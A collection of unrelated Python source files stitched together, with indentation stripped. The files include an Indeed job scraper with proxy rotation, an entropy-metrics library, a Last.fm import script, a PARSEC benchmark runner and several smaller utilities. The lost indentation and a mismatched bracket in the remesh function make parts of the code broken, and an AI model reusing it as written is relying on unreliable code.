numlist = [num for num in re.findall(r'-?\d+\.?\d*', text)]
repage = int(numlist[0])
if len(numlist) == 2:
match = int(numlist[1])
else:
match = int(''.join(numlist[1:]))
return repage, match
""
def scrapIndeedID(searchList, countryList, maxpage = 1, prox=False):
"""
Extract jobIDs from the search results provided by Indeed
:searchList: list of jobs or keywords to search
:country: list of countries in 2-letter code
:maxpage: int, max results page
:prox: bool, default False
:return: set of tuples, country and ID
"""
if maxpage > 101:
warnings.warn("maxpage args should be under 101", UserWarning)
maxpage = 101
setID = set()
for search in searchList:
search = search.replace(" ", "+")
if prox: proxies = RotateProxies()
proxy = None
for country_general in countryList:
country = country_general.lower()
if country == "us": country = "www" #"us" note redirected
listID = set()
limit = 50
start = repage = count = 0
match = float('inf')
while repage <= maxpage:
if len(listID) < match:
url = "https://{}.indeed.com/jobs?q={}&limit={}&start={}".format(
country, search, limit, start)
if count % 50 == 0 and prox: proxy = proxies.next()
try:
page = scrapPage(url, proxy)
except (Timeout, ProxyError):
if prox:
proxy = proxies.next()
continue
else:
break
except HTTPError:
break
else:
repage, match = stripmatch(page)
count += 1
if (match is None or repage < count):
break
else:
listID = listID.union({(country_general, jobID)
for jobID in list(scrapID(page))
})
start += limit
else: break
setID = setID.union(listID)
return setID
""
def dicoFromScrap(args):
"""
Normalize the data of the request response
:args: tuple of tupleID and proxy
:tupleID: tuple of country code and Indeed job ID
:proxy: dict of proxy
:return: standard dictionary of useful elements
"""
tupleID, proxy = args
dico = {}
url = "https://www.indeed.com/viewjob?jk={}".format(tupleID[1])
try:
page = scrapPage(url, proxy)
except HTTPError:
return dico
def postedDate(page):
try:
date = int(
re.findall(
r'-?\d+\.?\d*',
page.find("div", {
"class": "jobsearch-JobMetadataFooter"
}).text)[0])
except IndexError:
posted = datetime.now().isoformat(timespec='seconds')
else:
posted = (datetime.now() +
timedelta(days=-date)).isoformat(timespec='seconds')
if date == 30: posted = "+ " + posted
return posted
def companyName(page):
try:
name = page.find("div", {"class": "icl-u-lg-mr--sm"}).text
except AttributeError:
name = page.find("span", {
"class": "icl-u-textColor--success"
}).text
except:
name = ""
return name
dico["country"] = tupleID[0].upper()
dico["url"] = url
dico["description"] = page.find(id="jobDescriptionText").text
dico["header"], dico["city"], *_ = page.head.title.text.split(" - ")
dico["company"] = companyName(page)
dico["type"] = dico["category"] = ""
dico["posted"] = postedDate(page)
return dico
""
def IndeedScrap(searchList, countryList, maxpage = 1, prox=False):
"""
Extract and normalizes data from the search results
:searchList: list of jobs or keywords to search
:country: list of countries in 2-letter code
:maxpage: int, max number of page to scrap
:prox: bool, default False
:return: list of standard dictionaries
"""
scraped = list()
setID = scrapIndeedID(searchList, countryList, maxpage, prox)
if len(setID) < 20:
workers = len(setID)
else:
workers = len(setID) // 5
if prox:
proxies = list(islice(RotateProxies().proxies, workers)) * len(setID)
else:
proxies = [None] * len(setID)
workers = 1 if workers==0 else workers
with ThreadPoolExecutor(workers) as executor:
try:
for result in executor.map(dicoFromScrap, zip(setID, proxies)):
scraped.append(result)
except:
pass
return scraped
|
"""Entropy functions"""
import numpy as np
from numba import jit
from math import factorial, log
from sklearn.neighbors import KDTree
from scipy.signal import periodogram, welch
from .utils import _embed
all = ['perm_entropy', 'spectral_entropy', 'svd_entropy', 'app_entropy',
'sample_entropy', 'lziv_complexity']
def perm_entropy(x, order=3, delay=1, normalize=False):
"""Permutation Entropy.
Parameters
----------
x : list or np.array
One-dimensional time series of shape (n_times)
order : int
Order of permutation entropy. Default is 3.
delay : int
Time delay (lag). Default is 1.
normalize : bool
If True, divide by log2(order!) to normalize the entropy between 0
and 1. Otherwise, return the permutation entropy in bit.
Returns
-------
pe : float
Permutation Entropy.
Notes
-----
The permutation entropy is a complexity measure for time-series first
introduced by Bandt and Pompe in 2002.
The permutation entropy of a signal :math:`x` is defined as:
.. math:: H = -\\sum p(\\pi)\\log_2(\\pi)
where the sum runs over all :math:`n!` permutations :math:`\\pi` of order
:math:`n`. This is the information contained in comparing :math:`n`
consecutive values of the time series. It is clear that
:math:`0 ≤ H (n) ≤ \\log_2(n!)` where the lower bound is attained for an
increasing or decreasing sequence of values, and the upper bound for a
completely random system where all :math:`n!` possible permutations appear
with the same probability.
The embedded matrix :math:`Y` is created by:
.. math::
y(i)=[x_i,x_{i+\\text{delay}}, ...,x_{i+(\\text{order}-1) *
\\text{delay}}]
.. math:: Y=[y(1),y(2),...,y(N-(\\text{order}-1))*\\text{delay})]^T
References
----------
Bandt, Christoph, and Bernd Pompe. "Permutation entropy: a
natural complexity measure for time series." Physical review letters
88.17 (2002): 174102.
Examples
--------
Permutation entropy with order 2
>>> from entropy import perm_entropy
>>> x = [4, 7, 9, 10, 6, 11, 3]
>>> # Return a value in bit between 0 and log2(factorial(order))
>>> print(perm_entropy(x, order=2))
0.9182958340544896
Normalized permutation entropy with order 3
>>> from entropy import perm_entropy
>>> x = [4, 7, 9, 10, 6, 11, 3]
>>> # Return a value comprised between 0 and 1.
>>> print(perm_entropy(x, order=3, normalize=True))
0.5887621559162939
"""
x = np.array(x)
ran_order = range(order)
hashmult = np.power(order, ran_order)
# Embed x and sort the order of permutations
sorted_idx = _embed(x, order=order, delay=delay).argsort(kind='quicksort')
# Associate unique integer to each permutations
hashval = (np.multiply(sorted_idx, hashmult)).sum(1)
# Return the counts
_, c = np.unique(hashval, return_counts=True)
# Use np.true_divide for Python 2 compatibility
p = np.true_divide(c, c.sum())
pe = -np.multiply(p, np.log2(p)).sum()
if normalize:
pe /= np.log2(factorial(order))
return pe
def spectral_entropy(x, sf, method='fft', nperseg=None, normalize=False):
"""Spectral Entropy.
Parameters
----------
x : list or np.array
One-dimensional time series of shape (n_times)
sf : float
Sampling frequency, in Hz.
method : str
Spectral estimation method:
* ``'fft'`` : Fourier Transform (:py:func:`scipy.signal.periodogram`)
* ``'welch'`` : Welch periodogram (:py:func:`scipy.signal.welch`)
nperseg : int or None
Length of each FFT segment for Welch method.
If None (default), uses scipy default of 256 samples.
normalize : bool
If True, divide by log2(psd.size) to normalize the spectral entropy
between 0 and 1. Otherwise, return the spectral entropy in bit.
Returns
-------
se : float
Spectral Entropy
Notes
-----
Spectral Entropy is defined to be the Shannon entropy of the power
spectral density (PSD) of the data:
.. math:: H(x, sf) = -\\sum_{f=0}^{f_s/2} P(f) \\log_2[P(f)]
Where :math:`P` is the normalised PSD, and :math:`f_s` is the sampling
frequency.
References
----------
Inouye, T. et al. (1991). Quantification of EEG irregularity by
use of the entropy of the power spectrum. Electroencephalography
and clinical neurophysiology, 79(3), 204-210.
https://en.wikipedia.org/wiki/Spectral_density
https://en.wikipedia.org/wiki/Welch%27s_method
Examples
--------
Spectral entropy of a pure sine using FFT
>>> from entropy import spectral_entropy
>>> import numpy as np
>>> sf, f, dur = 100, 1, 4
>>> N = sf * dur # Total number of discrete samples
>>> t = np.arange(N) / sf # Time vector
>>> x = np.sin(2 * np.pi * f * t)
>>> np.round(spectral_entropy(x, sf, method='fft'), 2)
0.0
Spectral entropy of a random signal using Welch's method
>>> from entropy import spectral_entropy
>>> import numpy as np
>>> np.random.seed(42)
>>> x = np.random.rand(3000)
>>> spectral_entropy(x, sf=100, method='welch')
6.980045662371389
Normalized spectral entropy
>>> spectral_entropy(x, sf=100, method='welch', normalize=True)
0.9955526198316071
"""
x = np.array(x)
# Compute and normalize power spectrum
if method == 'fft':
_, psd = periodogram(x, sf)
elif method == 'welch':
_, psd = welch(x, sf, nperseg=nperseg)
psd_norm = np.divide(psd, psd.sum())
se = -np.multiply(psd_norm, np.log2(psd_norm)).sum()
if normalize:
se /= np.log2(psd_norm.size)
return se
def svd_entropy(x, order=3, delay=1, normalize=False):
"""Singular Value Decomposition entropy.
Parameters
----------
x : list or np.array
One-dimensional time series of shape (n_times)
order : int
Order of SVD entropy (= length of the embedding dimension).
Default is 3.
delay : int
Time delay (lag). Default is 1.
normalize : bool
If True, divide by log2(order!) to normalize the entropy between 0
and 1. Otherwise, return the permutation entropy in bit.
Returns
-------
svd_e : float
SVD Entropy
Notes
-----
SVD entropy is an indicator of the number of eigenvectors that are needed
for an adequate explanation of the data set. In other words, it measures
the dimensionality of the data.
The SVD entropy of a signal :math:`x` is defined as:
.. math::
H = -\\sum_{i=1}^{M} \\overline{\\sigma}_i log_2(\\overline{\\sigma}_i)
where :math:`M` is the number of singular values of the embedded matrix
:math:`Y` and :math:`\\sigma_1, \\sigma_2, ..., \\sigma_M` are the
normalized singular values of :math:`Y`.
The embedded matrix :math:`Y` is created by:
.. math::
y(i)=[x_i,x_{i+\\text{delay}}, ...,x_{i+(\\text{order}-1) *
\\text{delay}}]
.. math:: Y=[y(1),y(2),...,y(N-(\\text{order}-1))*\\text{delay})]^T
Examples
--------
SVD entropy with order 2
>>> from entropy import svd_entropy
>>> x = [4, 7, 9, 10, 6, 11, 3]
>>> # Return a value in bit between 0 and log2(factorial(order))
>>> print(svd_entropy(x, order=2))
0.7618909465130066
Normalized SVD entropy with order 3
>>> from entropy import svd_entropy
>>> x = [4, 7, 9, 10, 6, 11, 3]
>>> # Return a value comprised between 0 and 1.
>>> print(svd_entropy(x, order=3, normalize=True))
0.6870083043946692
"""
x = np.array(x)
mat = _embed(x, order=order, delay=delay)
W = np.linalg.svd(mat, compute_uv=False)
# Normalize the singular values
W /= sum(W)
svd_e = -np.multiply(W, np.log2(W)).sum()
if normalize:
svd_e /= np.log2(order)
return svd_e
def _app_samp_entropy(x, order, metric='chebyshev', approximate=True):
"""Utility function for `app_entropy`` and `sample_entropy`.
"""
_all_metrics = KDTree.valid_metrics
if metric not in _all_metrics:
raise ValueError('The given metric (%s) is not valid. The valid '
'metric names are: %s' % (metric, _all_metrics))
phi = np.zeros(2)
r = 0.2 * np.std(x, ddof=0)
# compute phi(order, r)
_emb_data1 = _embed(x, order, 1)
if approximate:
emb_data1 = _emb_data1
else:
emb_data1 = _emb_data1[:-1]
count1 = KDTree(emb_data1, metric=metric).query_radius(emb_data1, r,
count_only=True
).astype(np.float64)
# compute phi(order + 1, r)
emb_data2 = _embed(x, order + 1, 1)
count2 = KDTree(emb_data2, metric=metric).query_radius(emb_data2, r,
count_only=True
).astype(np.float64)
if approximate:
phi[0] = np.mean(np.log(count1 / emb_data1.shape[0]))
phi[1] = np.mean(np.log(count2 / emb_data2.shape[0]))
else:
phi[0] = np.mean((count1 - 1) / (emb_data1.shape[0] - 1))
phi[1] = np.mean((count2 - 1) / (emb_data2.shape[0] - 1))
return phi
@jit('f8(f8[:], i4, f8)', nopython=True)
def _numba_sampen(x, order, r):
"""
Fast evaluation of the sample entropy using Numba.
"""
n = x.size
n1 = n - 1
order += 1
order_dbld = 2 * order
# Define threshold
# r *= x.std()
# initialize the lists
run = [0] * n
run1 = run[:]
r1 = [0] * (n * order_dbld)
a = [0] * order
b = a[:]
p = a[:]
for i in range(n1):
nj = n1 - i
for jj in range(nj):
j = jj + i + 1
if abs(x[j] - x[i]) < r:
run[jj] = run1[jj] + 1
m1 = order if order < run[jj] else run[jj]
for m in range(m1):
a[m] += 1
if j < n1:
b[m] += 1
else:
run[jj] = 0
for j in range(order_dbld):
run1[j] = run[j]
r1[i + n * j] = run[j]
if nj > order_dbld - 1:
for j in range(order_dbld, nj):
run1[j] = run[j]
m = order - 1
while m > 0:
b[m] = b[m - 1]
m -= 1
b[0] = n * n1 / 2
a = np.array([float(aa) for aa in a])
b = np.array([float(bb) for bb in b])
p = np.true_divide(a, b)
return -log(p[-1])
def app_entropy(x, order=2, metric='chebyshev'):
"""Approximate Entropy.
Parameters
----------
x : list or np.array
One-dimensional time series of shape (n_times).
order : int
Embedding dimension. Default is 2.
metric : str
Name of the distance metric function used with
:py:class:`sklearn.neighbors.KDTree`. Default is to use the
`Chebyshev <https://en.wikipedia.org/wiki/Chebyshev_distance>`_
distance.
Returns
-------
ae : float
Approximate Entropy.
Notes
-----
Approximate entropy is a technique used to quantify the amount of
regularity and the unpredictability of fluctuations over time-series data.
Smaller values indicates that the data is more regular and predictable.
The tolerance value (:math:`r`) is set to :math:`0.2 * \\text{std}(x)`.
Code adapted from the `mne-features <https://mne.tools/mne-features/>`_
package by Jean-Baptiste Schiratti and Alexandre Gramfort.
References
----------
Richman, J. S. et al. (2000). Physiological time-series analysis
using approximate entropy and sample entropy. American Journal of
Physiology-Heart and Circulatory Physiology, 278(6), H2039-H2049.
https://scikit-learn.org/stable/modules/generated/sklearn.neighbors.DistanceMetric.html
Examples
--------
>>> from entropy import app_entropy
>>> import numpy as np
>>> np.random.seed(1234567)
>>> x = np.random.rand(3000)
>>> print(app_entropy(x, order=2))
2.076046899582793
"""
phi = _app_samp_entropy(x, order=order, metric=metric, approximate=True)
return np.subtract(phi[0], phi[1])
def sample_entropy(x, order=2, metric='chebyshev'):
"""Sample Entropy.
Parameters
----------
x : list or np.array
One-dimensional time series of shape (n_times).
order : int
Embedding dimension. Default is 2.
metric : str
Name of the distance metric function used with
:py:class:`sklearn.neighbors.KDTree`. Default is to use the
`Chebyshev <https://en.wikipedia.org/wiki/Chebyshev_distance>`_
distance.
Returns
-------
se : float
Sample Entropy.
Notes
-----
Sample entropy is a modification of approximate entropy, used for assessing
the complexity of physiological time-series signals. It has two advantages
over approximate entropy: data length independence and a relatively
trouble-free implementation. Large values indicate high complexity whereas
smaller values characterize more self-similar and regular signals.
The sample entropy of a signal :math:`x` is defined as:
.. math:: H(x, m, r) = -\\log\\frac{C(m + 1, r)}{C(m, r)}
where :math:`m` is the embedding dimension (= order), :math:`r` is
the radius of the neighbourhood (default = :math:`0.2 * \\text{std}(x)`),
:math:`C(m + 1, r)` is the number of embedded vectors of length
:math:`m + 1` having a
`Chebyshev distance <https://en.wikipedia.org/wiki/Chebyshev_distance>`_
inferior to :math:`r` and :math:`C(m, r)` is the number of embedded
vectors of length :math:`m` having a Chebyshev distance inferior to
:math:`r`.
Note that if ``metric == 'chebyshev'`` and ``len(x) < 5000`` points,
then the sample entropy is computed using a fast custom Numba script.
For other distance metric or longer time-series, the sample entropy is
computed using a code from the
`mne-features <https://mne.tools/mne-features/>`_ package by Jean-Baptiste
Schiratti and Alexandre Gramfort (requires sklearn).
References
----------
Richman, J. S. et al. (2000). Physiological time-series analysis
using approximate entropy and sample entropy. American Journal of
Physiology-Heart and Circulatory Physiology, 278(6), H2039-H2049.
https://scikit-learn.org/stable/modules/generated/sklearn.neighbors.DistanceMetric.html
Examples
--------
Sample entropy with order 2.
>>> from entropy import sample_entropy
>>> import numpy as np
>>> np.random.seed(1234567)
>>> x = np.random.rand(3000)
>>> print(sample_entropy(x, order=2))
2.192416747827227
Sample entropy with order 3 using the Euclidean distance.
>>> from entropy import sample_entropy
>>> import numpy as np
>>> np.random.seed(1234567)
>>> x = np.random.rand(3000)
>>> print(sample_entropy(x, order=3, metric='euclidean'))
2.724354910127154
"""
x = np.asarray(x, dtype=np.float64)
if metric == 'chebyshev' and x.size < 5000:
return _numba_sampen(x, order=order, r=(0.2 * x.std(ddof=0)))
else:
phi = _app_samp_entropy(x, order=order, metric=metric,
approximate=False)
return -np.log(np.divide(phi[1], phi[0]))
@jit('u8(unicode_type)', nopython=True)
def _lz_complexity(binary_string):
"""Internal Numba implementation of the Lempel-Ziv (LZ) complexity.
https://github.com/Naereen/Lempel-Ziv_Complexity/blob/master/src/lziv_complexity.py
"""
u, v, w = 0, 1, 1
v_max = 1
length = len(binary_string)
complexity = 1
while True:
if binary_string[u + v - 1] == binary_string[w + v - 1]:
v += 1
if w + v >= length:
complexity += 1
break
else:
v_max = max(v, v_max)
u += 1
if u == w:
complexity += 1
w += v_max
if w >= length:
break
else:
u = 0
v = 1
v_max = 1
else:
v = 1
return complexity
def lziv_complexity(sequence, normalize=False):
"""
Lempel-Ziv (LZ) complexity of (binary) sequence.
.. versionadded:: 0.1.1
Parameters
----------
sequence : str or array
A sequence of character, e.g. ``'1001111011000010'``,
``[0, 1, 0, 1, 1]``, or ``'Hello World!'``.
normalize : bool
If ``True``, returns the normalized LZ (see Notes).
Returns
-------
lz : int or float
LZ complexity, which corresponds to the number of different
substrings encountered as the stream is viewed from the
beginning to the end. If ``normalize=False``, the output is an
integer (counts), otherwise the output is a float.
Notes
-----
LZ complexity is defined as the number of different substrings encountered
as the sequence is viewed from begining to the end.
Although the raw LZ is an important complexity indicator, it is heavily
influenced by sequence length (longer sequence will result in higher LZ).
Zhang and colleagues (2009) have therefore proposed the normalized LZ,
which is defined by
.. math:: \\text{LZn} = \\frac{\\text{LZ}}{(n / \\log_b{n})}
where :math:`n` is the length of the sequence and :math:`b` the number of
unique characters in the sequence.
References
----------
* Lempel, A., & Ziv, J. (1976). On the Complexity of Finite Sequences.
IEEE Transactions on Information Theory / Professional Technical
Group on Information Theory, 22(1), 75–81.
https://doi.org/10.1109/TIT.1976.1055501
* Zhang, Y., Hao, J., Zhou, C., & Chang, K. (2009). Normalized
Lempel-Ziv complexity and its application in bio-sequence analysis.
Journal of Mathematical Chemistry, 46(4), 1203–1212.
https://doi.org/10.1007/s10910-008-9512-2
* https://en.wikipedia.org/wiki/Lempel-Ziv_complexity
* https://github.com/Naereen/Lempel-Ziv_Complexity
Examples
--------
>>> from entropy import lziv_complexity
>>> # Substrings = 1 / 0 / 01 / 1110 / 1100 / 0010
>>> s = '1001111011000010'
>>> lziv_complexity(s)
6
Using a list of integer / boolean instead of a string:
>>> # 1 / 0 / 10
>>> lziv_complexity([1, 0, 1, 0, 1, 0, 1, 0, 1, 0])
3
With normalization:
>>> lziv_complexity(s, normalize=True)
1.5
This function also works with characters and words:
>>> s = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
>>> lziv_complexity(s), lziv_complexity(s, normalize=True)
(26, 1.0)
>>> s = 'HELLO WORLD! HELLO WORLD! HELLO WORLD! HELLO WORLD!'
>>> lziv_complexity(s), lziv_complexity(s, normalize=True)
(11, 0.38596001132145313)
"""
assert isinstance(sequence, (str, list, np.ndarray))
assert isinstance(normalize, bool)
if isinstance(sequence, (list, np.ndarray)):
sequence = np.asarray(sequence)
if sequence.dtype.kind in 'bfi':
# Convert [True, False] or [1., 0.] to [1, 0]
sequence = sequence.astype(int)
# Convert to a string, e.g. "10001100"
s = ''.join(sequence.astype(str))
else:
s = sequence
if normalize:
# 1) Timmermann et al. 2019
# The sequence is randomly shuffled, and the normalized LZ
# is calculated as the ratio of the LZ of the original sequence
# divided by the LZ of the randomly shuffled LZ. However, the final
# output is dependent on the random seed.
# sl_shuffled = list(s)
# rng = np.random.RandomState(None)
# rng.shuffle(sl_shuffled)
# s_shuffled = ''.join(sl_shuffled)
# return _lz_complexity(s) / _lz_complexity(s_shuffled)
# 2) Zhang et al. 2009
n = len(s)
base = len(''.join(set(s))) # Number of unique characters
base = 2 if base < 2 else base
return _lz_complexity(s) / (n / log(n, base))
else:
return _lz_complexity(s)
|
#!/usr/bin/env python
import os
import logging
import pymongo
from datetime import datetime, timedelta
from pymongo import MongoClient
from recommender.infrastructure.lastfm import LastFMListeningRepository
from recommender.infrastructure.repository.mongodb import (
MongoDBTracksRepository
)
logging.basicConfig(
format='%(asctime)s - %(levelname)s - %(message)s',
level=getattr(logging, os.getenv("LOG_LEVEL", "INFO"))
)
listening_repo = LastFMListeningRepository(
logging.getLogger(),
os.environ["LASTFM_API_KEY"],
os.environ["LASTFM_API_SECRET"],
os.environ["LASTFM_USERNAME"],
os.environ["LASTFM_PASSWORD"]
)
client = MongoClient()
db = client.mgr
tracks_repository = MongoDBTracksRepository(db.playedtracks)
# START_TIME = datetime(2007, 7, 1)
START_TIME = datetime(2011, 3, 28)
END_TIME = datetime(2020, 3, 15)
if __name__ == "__main__":
day = START_TIME
while day <= END_TIME:
next_day = day + timedelta(days=1)
tracks = listening_repo.get_tracks(time_from=day, time_to=next_day)
day = next_day
for t in tracks:
logging.info(f"TRACK PLAYBACK: {t}")
try:
tracks_repository.save(t)
except pymongo.errors.DuplicateKeyError as e:
logging.warning(f"Ignoring duplicate record. {e}")
|
import sys, os, time, getopt, subprocess, tempfile
from parsec_platform import *
abspath = lambda d: os.path.abspath(os.path.join(d))
HOME = abspath(os.path.dirname(__file__))
__allbenchmarks = None
def allbenchmarks():
global __allbenchmarks
if not __allbenchmarks:
try:
benchmarks = subprocess.Popen([ '%(HOME)s/parsec-2.1/bin/parsecmgmt' % globals(), '-a', 'info' ], stdout = subprocess.PIPE).communicate()
benchmarks = [ line[15:].split(' ')[0] for line in benchmarks[0].split('\n') if line.startswith('[PARSEC] - ') and (line.endswith(' (apps)') or line.endswith(' (kernels)')) ]
__allbenchmarks = sorted(benchmarks)
except OSError:
return None
return __allbenchmarks
def allinputs():
return [ f[:-8] for f in os.listdir('%(HOME)s/parsec-2.1/config' % globals()) if f.endswith('.runconf') ]
def log2(n):
log2n = -1
while n:
n >>= 1
log2n += 1
return log2n
class Program:
def __init__(self, program, nthreads, inputsize, benchmark_options = []):
if program not in allbenchmarks():
raise ValueError("Invalid benchmark %s" % program)
if inputsize not in allinputs():
if inputsize in ('small', 'medium', 'large'):
inputsize = 'sim' + inputsize
else:
raise ValueError("Invalid input size %s" % inputsize)
self.program = program
self.nthreads = int(nthreads)
self.nthreads_force = 'force_nthreads' in benchmark_options
self.inputsize = inputsize
if program in ('freqmine',):
self.openmp = True
else:
self.openmp = False
for option in benchmark_options:
if option.startswith('pinthreads'):
if '=' in option:
corelist = option.split('=')[1]
else:
corelist = ','.join(map(str, range(nthreads)))
os.environ['PARMACS_PINTHREADS'] = corelist
# do the tests in self.nthreads, and fail early if we're called with an unsupported (program, nthreads, inputsize) combination
nthreads = self.get_nthreads()
# Check other constraints
if self.program == 'facesim':
nthreads_supported = (1, 2, 3, 4, 6, 8, 16, 32, 64, 128)
if nthreads not in nthreads_supported:
raise ValueError("Benchmark %s only supports running with %s threads" % (self.program, nthreads_supported))
elif self.program == 'fluidanimate':
# nthreads must be power of two, one master thread will be added
if nthreads != 1 << log2(nthreads):
raise ValueError("Benchmark %s: number of threads must be power of two" % self.program)
def get_nthreads(self):
if self.nthreads_force:
return self.nthreads
if self.program == 'blackscholes':
nthreads = self.nthreads - 1
elif self.program == 'bodytrack':
nthreads = self.nthreads - 2
elif self.program == 'facesim':
nthreads = self.nthreads
elif self.program == 'ferret':
nthreads = (self.nthreads - 2) / 4
elif self.program == 'fluidanimate':
# nthreads must be power of two, one master thread will be added
nthreads = 1 << log2(self.nthreads - 1)
elif self.program == 'swaptions':
nthreads = self.nthreads - 1
elif self.program == 'canneal':
nthreads = self.nthreads - 1
elif self.program == 'raytrace':
nthreads = self.nthreads - 1
elif self.program == 'dedup':
nthreads = self.nthreads / 4
elif self.program == 'streamcluster':
nthreads = self.nthreads - 1
elif self.program == 'vips':
nthreads = self.nthreads - 2
else:
nthreads = self.nthreads
if nthreads < 1:
raise ValueError("Benchmark %s needs more cores" % self.program)
return nthreads
def run(self, graphitecmd, postcmd = ''):
if postcmd != '':
sys.stderr.write('PARSEC Error: postcmd not supported\n')
return 1
flags = []
rundir = tempfile.mkdtemp()
if self.program == 'facesim':
# Facesim needs a {rundir}/Storytelling/output directory and tries to create it with a system() call
# -- which doesn't work under Graphite.
# Therefore: set up the complete rundir ourselves, including input files and Storytelling/output
inputfile = '%s/parsec-2.1/pkgs/apps/facesim/inputs/input_%s.tar' % (HOME, self.inputsize)
if not os.path.exists(inputfile):
print 'Cannot find input file %(inputfile)s' % locals()
sys.exit(-1)
flags.append('-k')
os.system('rm -r %(rundir)s/apps/facesim/run' % locals())
os.system('mkdir -p %(rundir)s/apps/facesim/run/Storytelling/output' % locals())
os.system('tar xvf %(inputfile)s -C %(rundir)s/apps/facesim/run' % locals())
if self.openmp:
os.putenv('OMP_NUM_THREADS', str(self.get_nthreads()))
proc = subprocess.Popen([ '%s/parsec-2.1/bin/parsecmgmt' % HOME,
'-a', 'run', '-p', self.program, '-c', PLATFORM, '-i', self.inputsize, '-n', str(self.get_nthreads()),
'-s', graphitecmd, '-d', rundir
] + flags)
proc.communicate()
os.system('rm -r %(rundir)s' % locals())
return proc.returncode
def rungraphiteoptions(self):
return ''
|
#Copyright (C) 2016 Zumium martin007323@gmail.com
#
#
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
from boxes import handlerBase
class ExportHandler(handlerBase.BaseHandler):
def __init__(self):
super().__init__()
def handle(self):
import tarfile
import shutil
import os
import os.path
#check number of arguments
if self.argumentNum ==0 or self.argumentNum > 2:
print('usage: boxes export BOX [/path/to/put/archivefile]')
return
#check argument type
if self.arguments[0]['type'] != 'box':
print('usage: boxes export BOX [/path/to/put/archivefile]')
return
if self.argumentNum == 2:
if self.arguments[1]['type'] != 'path':
print('usage: boxes export BOX [/path/to/put/archivefile]')
return
else:
self.arguments.append({'type':'path','path':os.getcwd()})
#get absolute path
self.arguments[1]['path']=os.path.abspath(self.arguments[1]['path'])
#check whether box exists
boxName=self.arguments[0]['box']
if not (self.checkBoxExists(boxName) or self.checkArchivedBoxExists(boxName)):
print('box {} doesn\'t exist'.format(boxName))
return
#figure out it is archived or unarchived
isUnarchived=self.checkBoxExists(boxName)
pathToCopyAt=self.arguments[1]['path']
#add slash to tail
if pathToCopyAt[-1] != self.pathSeperator:
pathToCopyAt+=self.pathSeperator
#start to export
if isUnarchived:
#it is unarchived
#new a tar file
boxTarFile=tarfile.open(pathToCopyAt+boxName+self.archiveTail,'w:'+self.compressType)
#backup current working direcroty
preCwd=os.getcwd()
#change to boxes' parent directory
os.chdir(self.getFullBoxPath(''))
#add box folder to tarfile
boxTarFile.add(boxName)
#close tarfile
boxTarFile.close()
#change current working directory back
os.chdir(preCwd)
else:
#it is archived
#copy it directly out
shutil.copy(self.getFullArchivedBoxPath(boxName),pathToCopyAt)
|
# A part of pdfrw (https://github.com/pmaupin/pdfrw)
# Copyright (C) 2006-2015 Patrick Maupin, Austin, Texas
# MIT license -- See LICENSE.txt for details
'''
Currently, this sad little file only knows how to compress
using the flate (zlib) algorithm. Maybe more later, but it's
not a priority for me...
'''
from .objects import PdfName
from .uncompress import streamobjects
from .py23_diffs import zlib, convert_load, convert_store
def compress(mylist):
flate = PdfName.FlateDecode
for obj in streamobjects(mylist):
ftype = obj.Filter
if ftype is not None:
continue
oldstr = obj.stream
newstr = convert_load(zlib.compress(convert_store(oldstr)))
if len(newstr) < len(oldstr) + 30:
obj.stream = newstr
obj.Filter = flate
obj.DecodeParms = None
|
from app.validators.blocks.unrelated_block_validator import UnrelatedBlockValidator
from app.validators.questionnaire_schema import QuestionnaireSchema
from tests.test_questionnaire_validator import _open_and_load_schema_file
def test_invalid_actions():
filename = "schemas/invalid/test_invalid_relationships_unrelated.json"
questionnaire_schema = QuestionnaireSchema(_open_and_load_schema_file(filename))
block = questionnaire_schema.get_block("relationships").get("unrelated_block")
validator = UnrelatedBlockValidator(block, questionnaire_schema)
expected_errors = [
{
"message": validator.ACTION_PARAMS_MISSING,
"block_id": "related-to-anyone-else",
}
]
validator.validate()
assert validator.errors == expected_errors
|
from xicam.plugins.operationplugin import operation, output_names, display_name, describe_input, describe_output, \
categories, plot_hint
import numpy as np
import pyFAI
import hipies
@operation
@display_name('Remesh')
@describe_input('data', 'Detector image')
@describe_input('geometry', 'pyFAI Geometry')
@describe_input('alpha_in', 'GISAXS incidence angle')
@describe_input('out_range', 'coordinates of output image')
@describe_input('resolution', 'resolution of output image')
@describe_input('coord_sys', 'Choice of coordinate system for output image')
@output_names('I', 'x', 'y', 'geometry')
@describe_output('I', 'remapped image')
@describe_output('x', 'X-coordinates output image')
@describe_output('y', 'Y-coordinates output image')
@describe_output('geometry', 'pyFAI geometry')
def image_remap(data: np.ndarray,
geometry: pyFAI.geometry.Geometry,
alpha_in: float,
out_range: list=None,
resolution: list=None,
coord_sys: str='qp_qz') -> np.ndarray:
I, x, y = hipies.remesh(data, geometry, alpha_in, out_range = out_range,
res = resolution, coord_sys = coord_sys)
dist = geometry._dist
centerX = np.unravel_index(x.abs().argmin(), x.shape)[1]
centerY = np.unravel_index(y.abs().argmin(), y.shape)[0]
pixel = [geometry.get_pixel1(), geometry.get_pixel2()]
center = [ centerX * pixel[0], centerY * pixel[1])
geometry.setFit2D(geometry._dist, center[0], center[1])
return I, x, y, geometry
|
from JumpScale import j
class LogRotate(object):
def start(self):
j.system.process.execute('logrotate /etc/logrotate.d/*')
def stop(self):
pass
def restart(self):
pass
def status(self):
pass
|
"""
This module is a wrapper around parsets used in YandaSoft.
The code takes template parset(s) and creates custom parsets for pipelines such as the gridded DINGO pipeline.
Currently not everything is supported and the wrapper is not complete, i.e. the user can break the wrapper if not careful!
"""
__all__ = ['list_supported_parset_settings', 'create_parset_mapping',
'check_preconditioner_suppoort', 'check_parameter_and_Imager_compatibility',
'check_parameter_and_Preconditioner_compatibility',
'check_parameter_and_Gridder_compatibility', 'Parset']
import os
import logging
#=== Setup logging ===
log = logging.getLogger(__name__)
#=== Globals ===
global _SUPPORTED_IMAGERS
global _SUPPORTED_SOLVERS
global _SUPPORTED_GRIDDER_NAMES
global _SUPPORTED_PRECONDITIONERS
_SUPPORTED_IMAGERS = ['Cimager', 'Cdeconvolver', 'dstack']
_SUPPORTED_SOLVERS = ['Clean']
_SUPPORTED_GRIDDER_NAMES = ['Box', 'SphFunc', 'WStack', 'WProject']
